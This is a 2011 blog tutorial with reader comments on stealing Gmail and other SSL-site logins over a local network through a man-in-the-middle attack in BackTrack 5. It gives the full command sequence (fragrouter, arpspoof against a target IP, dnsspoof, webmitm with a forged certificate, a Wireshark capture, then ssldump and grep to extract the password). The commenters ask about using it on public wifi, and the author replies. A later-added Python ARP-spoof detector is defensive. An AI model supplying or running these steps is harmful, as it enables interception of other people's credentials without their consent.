
Wednesday, October 5, 2011

Hacking Passwords Using MITM (Man In The Middle) Attack On BackTrack 5

Posted by wildrank on Wednesday, October 05, 2011
Today in this article I will be showing you how to hack Gmail credentials (passwords, user IDs and so on), or the credentials of any other SSL (Secure Sockets Layer) site, on a local network, using a MITM (man in the middle) attack with BackTrack 5.

Concept :-

It is nothing but an attacker who sits between two parties on a network. Normally the two parties are the user and the router (gateway). The attacker uses a few tricks to take over the role of the router and put himself in its position. This is done by DNS spoofing, ARP poisoning, IP spoofing and a few other methods. In this attack the user does not notice that his traffic is being forwarded through the attacker. The attacker can simply gather information about the user and use it later, or he can move on to an active attack against the user.



Definitions:
  • SSL: Secure Sockets Layer, a protocol that secures data sent over the Internet using encryption. With SSL, client and server exchange public keys, allowing them to encrypt and decrypt their communication, so an attacker who sniffs the traffic between them gets only encrypted garbage. Web servers that use SSL are denoted by HTTPS.
  • ARP: Address Resolution Protocol is a network layer protocol used to convert an IP address into a physical address such as an Ethernet (MAC) address. A host wishing to obtain a physical address broadcasts an ARP request onto the TCP/IP network. The host on the network that has the IP address in the request then replies with its physical hardware address.
  • DNS: Domain Name System is a database system that translates a domain name into an IP address. For example, if you type gmail.com in your browser, your DNS server replies with Gmail's IP so that your router can connect to Gmail's server using that IP. For a better understanding, type "nslookup" in your cmd or konsole and then type "gmail.com"; you will see your DNS server reply with Gmail's IP addresses.
  • ARP Spoofing: ARP spoofing is a technique in which a host in a LAN can "poison" the ARP table of another host by forging fake ARP requests and replies, causing it to send packets to the wrong destination. The attacker can modify the traffic in the network in such a way that all of it is redirected through him. ARP spoofing thus allows the attacker to sniff data frames.
  • DNS Spoofing: DNS spoofing is similar to ARP spoofing; it is based on presenting false DNS information to the slave in response to its DNS request, thereby forcing it to visit a site which is not the real one.
  • MITM: A man in the middle attack means intercepting a communication between two systems; both ARP spoofing and DNS spoofing are types of MITM attack.
  • IP Forwarding: IP forwarding enables one host to sit on two LANs and act as a gateway, forwarding IP packets from one LAN to the other.

Tools:
  • Fragrouter - tool used for IP forwarding between the slave and its destination host.
  • Arpspoof - to ARP spoof the slave machine and its gateway.
  • Dnsspoof - to DNS spoof the slave machine and its gateway.
  • Webmitm - a tool which transparently proxies and sniffs HTTP/HTTPS traffic redirected by dnsspoof, capturing most "secure" SSL-encrypted webmail logins and form submissions.
  • Wireshark - a network protocol analyzer. Here it is used to capture the SSL-encrypted traffic between the slave and webmitm.
  • Ssldump - decrypts SSL packets using the private key.

All these tools are installed in BackTrack 5.



Step 1: First we need to set up IP forwarding using fragrouter. Open a shell and type the command:

Code:
fragrouter -B1


This forwards packets between the slave and its gateway while we are spoofing. Minimize the shell.

Step 2: Now we need to ARP spoof the slave. Open a new shell and type the command:

Code:
arpspoof -t [target ip] [default gateway ip]

example:

arpspoof -t 192.168.1.7 192.168.1.1


Then minimize the shell. Now we have begun to ARP spoof the slave.

Step 3: Then, for DNS spoofing, open a new shell and type:

Code:
dnsspoof


Then minimize the shell. Now all the DNS requests from the slave will be redirected to us.

Step 4: To proxy the connections that these spoofed DNS answers send our way, we have to start webmitm. Open a new shell and type:

Code:
webmitm -d

If you are starting webmitm for the first time, it will ask you for some details to create the fake SSL certificate and private key. Just fill in something. Once you have filled everything in, it will say "webmitm relaying transparently".


OK, it's done. Minimize the shell.

Step 5: Now we need to capture the traffic using Wireshark:

Code:
applications -> backtrack -> information gathering -> network analysis -> network traffic analysis -> wireshark

Step 6: In Wireshark select:

Code:
capture -> interfaces -> start (click the start button near eth0)

That's it.

Since DNS has been spoofed, an nslookup for gmail on the slave computer now shows the attacker's IP:


In our case the slave opens "gmail.com" in the browser. He is redirected to webmitm, which serves the "Gmail page" with the fake SSL certificate; the slave then logs into "Gmail" with his credentials. All of this traffic is captured by Wireshark. Now stop Wireshark and save the captured traffic to the root folder; for example, I will save it as "test".


In the root folder there will be another file called "webmitm.crt". It is the fake SSL certificate, together with its private key, generated by webmitm. Because the slave's SSL session was terminated by webmitm rather than by Gmail's real server, this is the key that can decrypt the capture.
Now we have the captured SSL packets and our own fake SSL certificate.


Now, to decrypt the captured packets, open another new shell and type:

Code:
ssldump -r test -k webmitm.crt -d > finaloutput


where,
test --> captured packets
webmitm.crt --> SSL certificate and private key
finaloutput --> decrypted output file

Now open a shell and type:

Code:
cat finaloutput | grep Email


It will show you the decrypted username and password.
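As an added, defender-side example (not from the original article), here is a small Python monitor showing how the ARP spoofing step above can be noticed by the victim host or by a sensor on the same LAN: it keeps the first IP-to-MAC binding it sees (seeded with the known gateway) and alerts when a later ARP reply changes that binding, or when one MAC claims several IPs. The packet fields and the addresses in the sample stream are constructed assumptions; in practice they would be read from a capture file or a live socket.

```python
from dataclasses import dataclass

@dataclass(frozen=True)
class ArpPacket:
    """Minimal view of an ARP packet: opcode 1 = request, 2 = reply."""
    opcode: int
    sender_ip: str
    sender_mac: str

class ArpWatch:
    """Tracks IP->MAC bindings and reports changes that look like poisoning."""
    def __init__(self, static_bindings=None):
        # Seed with known-good bindings so the first forged reply is flagged, not learned.
        self.ip_to_mac = dict(static_bindings or {})
        self.mac_to_ips = {}
        for ip, mac in self.ip_to_mac.items():
            self.mac_to_ips.setdefault(mac, set()).add(ip)

    def observe(self, pkt):
        """Feed one ARP packet; return an alert string, or None if benign."""
        if pkt.opcode != 2:
            return None  # only replies assert a binding
        alert = None
        known = self.ip_to_mac.get(pkt.sender_ip)
        if known is None:
            self.ip_to_mac[pkt.sender_ip] = pkt.sender_mac  # learn first binding
        elif known != pkt.sender_mac:
            # arpspoof's mark: the gateway IP answering from a new MAC; keep the trusted binding.
            alert = f"ARP binding change: {pkt.sender_ip} was {known}, now {pkt.sender_mac}"
        ips = self.mac_to_ips.setdefault(pkt.sender_mac, set())
        ips.add(pkt.sender_ip)
        if alert is None and len(ips) > 1:
            # Weaker signal: one MAC claiming several IPs (attacker's own plus the gateway's).
            alert = f"MAC {pkt.sender_mac} claims several IPs: {sorted(ips)}"
        return alert

def demo():
    """Constructed sample traffic: legitimate replies, then forged ones."""
    gateway_ip, gateway_mac = "192.168.1.1", "00:11:22:33:44:01"  # assumed values
    attacker_mac = "00:11:22:33:44:05"
    stream = [
        ArpPacket(2, gateway_ip, gateway_mac),
        ArpPacket(2, "192.168.1.5", attacker_mac),          # attacker's own address
        ArpPacket(1, "192.168.1.7", "00:11:22:33:44:07"),   # a request, ignored
        ArpPacket(2, gateway_ip, attacker_mac),             # forged: gateway IP, attacker MAC
        ArpPacket(2, gateway_ip, attacker_mac),
    ]
    watch = ArpWatch(static_bindings={gateway_ip: gateway_mac})
    return [watch.observe(p) for p in stream]
```

A static gateway binding on the client, or the equivalent check in a switch's dynamic ARP inspection, stops the forged reply from ever being learned; the monitor above is the detection counterpart of that.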

So friends, I hope you have enjoyed reading the article. If you have any doubts, please mention them in the comments.

Enjoy HaCkInG...



Comments (16)


naveen hacker · 697 weeks ago

Hi dude... can you give me a list of where I can use these things? You are using two IPs... I am not understanding fully.
Can I use it for public wifi access?
1 reply · active 696 weeks ago
I tested in LAN only. I think it will work in wifi also.
Hey Boss XD
I'm having some problems. First, where do I download the software?
Second, what is BackTrack 5? Is it a Linux, like Ubuntu?

I'm waiting for the answers, thx!!!
1 reply · active 679 weeks ago
Juan Hernandez · 683 weeks ago

I just have one question about the command "arpspoof -t [target ip] [default gateway ip]". How can I figure out what the target IP and default gateway IP are? Like, run ipconfig to get the default gateway, and the target IP would be, in this case, the Gmail login page IP?
1 reply · active 679 weeks ago
Google it... you will get many ways to find out IP addresses, using FB/Yahoo messenger etc.
Scott Thomas · 656 weeks ago

Bonjour Niketan Patil,

It's a very good tutorial but I have a query regarding it. First of all let me explain my scenario. My gateway is a broadband internet device, say at 192.168.1.1, supporting both LAN and WiFi (WPA2, AES 256-bit encryption). The victim is connected to the gateway via WiFi and the attacker is connected through LAN.

Query 1: Does this attack work in this scenario, or must the victim also be on the LAN?

Query 2: My understanding of SSL is that all SSL-encrypted communication is done via a session key. You are decrypting the captured traffic with the server's private key, but still you are getting the Gmail username and password. Kindly identify the step in the SSL communication where this attack takes place?

Query 3: Kindly also explain the network scenario on which you launched the attack, and also mention the web browsers and their version numbers on which you tested this tutorial?

Regards
Scott Thomas
1 reply · active 643 weeks ago
Query 1: It works; it needs just the IP address of the victim's machine and the gateway IP.
At this stage,
"ssldump -r test -k webmitm.crt -d > finaloutput"
when I typed the code above the shell replied:
"PCAP: bad dump file format
ERROR: Aborting"

Please help. Thank you.
2 replies · active 563 weeks ago
Had the same problem at first. You need to save the "test" file from Wireshark as a Wireshark/tcpdump libpcap file.

The issue that I'm having is that the "finaloutput" file from ssldump is empty. I'm testing this on my own network, using Windows 7 with Firefox on my target computer. I've repeatedly logged in and out of Gmail to ensure the credentials are being sent, but the ssldump file is still empty. I'm curious if there's a guide somewhere on how to identify / decrypt the packets captured in Wireshark. The majority of what I've seen doesn't quite do what I need it to, or I'm too much of a noob to apply it to what I'm doing.

Thanks!

DJ
Capture your test data using tcpdump/Wireshark with the file type Wireshark/tcpdump libpcap. Also check that libpcap is installed on your system.
This is outdated: browsers today verify those certificates and block access to the redirected page. Chrome uses HTTPS, blocking my cert, so... useless.
1 reply · active 636 weeks ago
Hmmm... I have written such tutorials for newbies.
When I finish typing cat finaloutput | grep Email I don't get any results. My target was connected to the same LAN as mine. I have been trying to get this to work but no luck so far.
